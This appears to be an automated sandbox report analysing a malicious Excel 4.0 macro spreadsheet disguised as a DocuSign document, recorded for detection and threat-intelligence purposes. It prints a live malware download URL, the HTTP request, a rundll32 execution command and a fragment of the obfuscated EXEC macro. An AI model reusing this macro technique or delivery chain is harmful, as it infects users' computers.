
Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.27303.12062

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen3.10350.27303.12062 (renamed file extension from 12062 to xls)
Analysis ID:355599
MD5:ad9550ee6ece8322501ed92d374d3928
SHA1:d0617e5cb90b4db4fcf2269ffd8228b9ca4f89af
SHA256:74423c8236cd5057af8e4ffbf84fdcbb34f5e6dc8f8dc0520c685c7fd6bc100a

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates a big amount of memory (probably used for heap spraying)
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1748 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2728 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls
Rule: SUSP_Excel4Macro_AutoOpen
Description: Detects Excel4 macro use with auto open / close
Author: John Lambert @JohnLaTwC
Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x26ca2:$s1: Excel
  • 0x27d0a:$s1: Excel
  • 0x35b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data: Command: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1748, ProcessCommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, ProcessId: 2728

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://www.chipmania.it/mails/open.php | Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | Virustotal: Detection: 11%

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: excel.exe | Memory has grown: Private usage: 4MB later: 60MB
Source: global traffic | DNS query: name: www.chipmania.it
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 185.81.0.78:80
Source: Joe Sandbox View | IP Address: 185.81.0.78
Source: global traffic | HTTP traffic detected:
  GET /mails/open.php HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: www.chipmania.it
  Connection: Keep-Alive
Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: www.chipmania.it
Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Found malicious Excel 4.0 Macro
Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | Initial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable editing button from the yellow bar above 15 " Once you have enabled editing, please click
Source: Screenshot number: 4 | Screenshot OCR: Enable content button jl , ' ' "==~ " from the yellow bar above 18 m ^mt~ .. |j 23 24 25 2
Source: Document image extraction number: 0 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
Source: Document image extraction number: 0 | Screenshot OCR: Enable content button from the yellow bar above I \ , I ' /
Found Excel 4.0 Macro with suspicious formulas
Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | Initial sample: EXEC
Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | OLE indicator, VBA macros: true
Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal88.expl.evad.winXLS@3/5@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\4FCE0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC37D.tmp
Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | Virustotal: Detection: 11%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Scripting²¹, Exploitation for Client Execution²³, At (Linux), At (Windows), Cron, Launchd
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Privilege Escalation: Process Injection¹, Extra Window Memory Injection¹, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Defense Evasion: Masquerading¹, Disable or Modify Tools¹, Rundll32¹, Process Injection¹, Scripting²¹, Extra Window Memory Injection¹
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: File and Directory Discovery¹, System Information Discovery², Query Registry, System Network Configuration Discovery, Remote System Discovery, System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Command and Control: Non-Application Layer Protocol², Application Layer Protocol¹², Ingress Tool Transfer¹, Protocol Impersonation, Fallback Channels, Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features
Impact: Modify System Partition, Device Lockout, Delete Device Data

Behavior Graph


Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | Detection: 11% | Scanner: Virustotal

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source: chipmania.it | Detection: 1% | Scanner: Virustotal
Source: www.chipmania.it | Detection: 2% | Scanner: Virustotal

URLs

Source: http://www.icra.org/vocabulary/. | Detection: 0% | Scanner: URL Reputation | Label: safe
Source: http://windowsmedia.com/redir/services.asp?WMPFriendly=true | Detection: 0% | Scanner: URL Reputation | Label: safe
Source: http://www.chipmania.it/mails/open.php | Detection: 100% | Scanner: Avira URL Cloud | Label: malware

Domains and IPs

Contacted Domains

Name: chipmania.it | IP: 185.81.0.78 | Active: true | Malicious: false | Reputation: unknown
Name: www.chipmania.it | IP: unknown | Active: unknown | Malicious: false | Reputation: unknown

Contacted URLs

Name: http://www.chipmania.it/mails/open.php | Malicious: true | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown

URLs from Memory and Binaries

Name: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | Source: rundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmp | Malicious: false | Reputation: high
Name: http://www.windows.com/pctv. | Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmp | Malicious: false | Reputation: high
Name: http://investor.msn.com | Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmp | Malicious: false | Reputation: high
Name: http://www.msnbc.com/news/ticker.txt | Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmp | Malicious: false | Reputation: high
Name: http://www.icra.org/vocabulary/. | Source: rundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmp | Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
Name: http://windowsmedia.com/redir/services.asp?WMPFriendly=true | Source: rundll32.exe, 00000003.00000002.2148203075.0000000001E37000.00000002.00000001.sdmp | Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
Name: http://www.hotmail.com/oe | Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmp | Malicious: false | Reputation: high
Name: http://investor.msn.com/ | Source: rundll32.exe, 00000003.00000002.2148054390.0000000001C50000.00000002.00000001.sdmp | Malicious: false | Reputation: high

Contacted IPs

Public

IP: 185.81.0.78 | Domain: unknown | Country: Italy | ASN: 52030 | ASN Name: SERVERPLAN-ASIT | Malicious: false

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:355599
Start date:20.02.2021
Start time:02:06:08
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 56s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:SecuriteInfo.com.Exploit.Siggen3.10350.27303.12062 (renamed file extension from 12062 to xls)
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal88.expl.evad.winXLS@3/5@1/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Found warning dialog
  • Click Ok
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match: 185.81.0.78
Associated samples (Detection: malicious; Context: www.chipmania.it/mails/open.php):
  • SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls
  • SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls
  • SecuriteInfo.com.Heur.1476.xls
  • SecuriteInfo.com.Heur.1181.xls
  • SecuriteInfo.com.Heur.21235.xls
  • SecuriteInfo.com.Heur.15875.xls
  • SecuriteInfo.com.Heur.21759.xls
  • SecuriteInfo.com.Heur.2804.xls
  • SecuriteInfo.com.Heur.1138.xls
  • SecuriteInfo.com.Heur.11266.xls
  • SecuriteInfo.com.Heur.18554.xls
  • Sign-636.xls
  • Sign-92793351_1597657581.xls
  • Sign-979329054_1327186231.xls
  • Sign-709986424_219667767.xls
  • Sign-709986424_219667767.xls
  • Sign-488964532_2104982999.xls
  • Sign-488964532_2104982999.xls
  • Sign-707465831_1420670581.xls

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

ASN

Match: SERVERPLAN-ASIT
Associated samples (Detection: malicious; Context: 185.81.0.78 unless noted):
  • SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls
  • SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls
  • SecuriteInfo.com.Heur.1476.xls
  • SecuriteInfo.com.Heur.1181.xls
  • SecuriteInfo.com.Heur.21235.xls
  • SecuriteInfo.com.Heur.15875.xls
  • SecuriteInfo.com.Heur.21759.xls
  • SecuriteInfo.com.Heur.2804.xls
  • SecuriteInfo.com.Heur.1138.xls
  • SecuriteInfo.com.Heur.11266.xls
  • SecuriteInfo.com.Heur.18554.xls
  • Sign-636.xls
  • Sign-92793351_1597657581.xls
  • Sign-979329054_1327186231.xls
  • Sign-709986424_219667767.xls
  • Sign-709986424_219667767.xls
  • Sign-488964532_2104982999.xls
  • Sign-488964532_2104982999.xls
  • Sign-707465831_1420670581.xls
  • SecuriteInfo.com.Exploit.Siggen3.10048.21670.xls (Context: 93.95.216.145)

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\3CCE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):155530
Entropy (8bit):7.660584123957991
Encrypted:false
SSDEEP:3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXj:YEGSzx0dmxk7RbsYsKtseoXT
MD5:C44E2E9FEFA57B31CDEFC8D201D895B5
SHA1:6507ACF9CFBF7142AD5696253F3ABC300BB662CE
SHA-256:9D1BC9044DB37900099FC4CB51160F6EA2C9A34D19ABEC0219F134C762991BE4
SHA-512:D1C34695305599BDD43B280720D2AAA4E5C5DDC4A5B41449E85F16895D85C9474982D1F88254CD153D66B2A07C3F1B3E7AA48D0B4FE457F590059F01B45ECFCE
Malicious:false
Reputation:low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Feb 20 09:06:38 2021, atime=Sat Feb 20 09:06:38 2021, length=8192, window=hide
Category:dropped
Size (bytes):867
Entropy (8bit):4.488986575688329
Encrypted:false
SSDEEP:12:85QUNcLgXg/XAlCPCHaXtB8XzB/KPaUX+WnicvbwbDtZ3YilMMEpxRljK6TdJP9O:85jNK/XTd6jASUYegDv3qfrNru/
MD5:781443D351DE3D8B9E000C3D089898F3
SHA1:7AE6978567BD588E9117BA9E8EC200331B4714AA
SHA-256:EF036CCC61EFD384EB738CB22440DA9C5E95B4CB67C72B5FB430D55034011F7D
SHA-512:C43F4F27886E9B341A186F28750D85A6117902945603142928AD61BD1686D1D0867889641183008810454D4E435F40CEDAB29C67FC16E24C88702114343D3802
Malicious:false
Reputation:low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Siggen3.10350.27303.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Feb 20 09:06:25 2021, mtime=Sat Feb 20 09:06:38 2021, atime=Sat Feb 20 09:06:38 2021, length=168448, window=hide
Category:dropped
Size (bytes):2368
Entropy (8bit):4.569920188815355
Encrypted:false
SSDEEP:48:8HAd/XT0jxHC31qHClfQh2HAd/XT0jxHC31qHClfQ/:8HG/XojxitlfQh2HG/XojxitlfQ/
MD5:FC67E56CC21CA04C73C4B56C9D1B47FF
SHA1:ADEA14F4591F2632F89A83ED1045502CB94FD043
SHA-256:D6F94A6DFDE437561339F3F912B8D14674425D9A646A914197EF1F0BD25F9010
SHA-512:212BA29FB7714D1D43FA97EDC52453DED1301CF57A6E9B45EE898C8E5A39E0CA9DCAB706D7DD829BAC52ACD03C9914EEC8EA0893E30E678734C72F7A76A4085E
Malicious:false
Reputation:low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):185
Entropy (8bit):4.833884412063983
Encrypted:false
SSDEEP:3:oyBVomM0bcsoMW/SWCuscbcsoMW/SWCmM0bcsoMW/SWCv:dj60wsoMWKW7wsoMWKWU0wsoMWKWs
MD5:8008051768264A8F63462178EE0A3809
SHA1:2FA73992D0C2D6C872FF64374034E841D3BB0CAA
SHA-256:57612946322F859DBB4A3CEF93B041BA8F62C0BC4252DB26A95F8EE72A64CF32
SHA-512:F054CBE1CA26C4C63742A29E28FF8D183349875863887E2EEEA4EEF42191F29F5B36DEAD52CB394524A97FD3E56D0172D7EF27F44807B19206B5A666C4D988AB
Malicious:false
Reputation:low
Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.27303.LNK=0..SecuriteInfo.com.Exploit.Siggen3.10350.27303.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.27303.LNK=0..
              C:\Users\user\Desktop\4FCE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:Applesoft BASIC program data, first line number 16
              Category:dropped
              Size (bytes):177025
              Entropy (8bit):7.239939186555363
              Encrypted:false
              SSDEEP:3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2Qn8:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKo
              MD5:55BB2085B17B24C9047A18CAB0FEDBAB
              SHA1:CE0E5D44B46F4517000E492D307E49280220CFEA
              SHA-256:16A11EE385E26D296DA33E0D46AB9D4F18C9DE51088D8D14B9A13D8C0913A603
              SHA-512:2C2EA2C4952C74726EE9304AE9719F7858A888FE6CE9F45A619033C09CB36DCEDAB00B9091A43858316C85BEC7A8CD5BB70C689CCD282BB4C19831998CE89EB7
              Malicious:false
              Reputation:low
              Preview: ........g2.........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

              Static File Info

              General

              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 10:48:36 2021, Security: 0
              Entropy (8bit):7.195176543915214
              TrID:
              • Microsoft Excel sheet (30009/1) 78.94%
              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
              File name:SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls
              File size:168960
              MD5:ad9550ee6ece8322501ed92d374d3928
              SHA1:d0617e5cb90b4db4fcf2269ffd8228b9ca4f89af
              SHA256:74423c8236cd5057af8e4ffbf84fdcbb34f5e6dc8f8dc0520c685c7fd6bc100a
              SHA512:531ab2de644449e17e4f6d4a708f98a89bd6ac972b0bc6ed6b725205e5a0412ef6b0dfa9bdb422f6732c5396b8d0c82783c88c3727496488c71cb960b25d2f0b
              SSDEEP:3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMj:OcKoSsxzNDZLDZjlbR868O8KlVH3jiK+
              File Content Preview:........................>.......................H...........................E...F...G..........................................................................................................................................................................

              File Icon

              Icon Hash:e4eea286a4b4bcb4

              Static OLE Info

              General

              Document Type:OLE
              Number of OLE Files:1

              OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls"

              Indicators

              Has Summary Info:True
              Application Name:Microsoft Excel
              Encrypted Document:False
              Contains Word Document Stream:False
              Contains Workbook/Book Stream:True
              Contains PowerPoint Document Stream:False
              Contains Visio Document Stream:False
              Contains ObjectPool Stream:
              Flash Objects Count:
              Contains VBA Macros:True

              Summary

              Code Page:1251
              Author:
              Last Saved By:
              Create Time:2006-09-16 00:00:00
              Last Saved Time:2021-02-19 10:48:36
              Creating Application:Microsoft Excel
              Security:0

              Document Summary

              Document Code Page:1251
              Thumbnail Scaling Desired:False
              Contains Dirty Links:False
              Shared Document:False
              Changed Hyperlinks:False
              Application Version:917504

              Streams

              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
              General
              Stream Path:\x5DocumentSummaryInformation
              File Type:data
              Stream Size:4096
              Entropy:0.357299206868
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00
              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
              General
              Stream Path:\x5SummaryInformation
              File Type:data
              Stream Size:4096
              Entropy:0.247217286775
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800
              General
              Stream Path:Workbook
              File Type:Applesoft BASIC program data, first line number 16
              Stream Size:157800
              Entropy:7.46869820242
              Base64 Encoded:True
              Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
              Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

              Macro 4.0 Code

              ,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
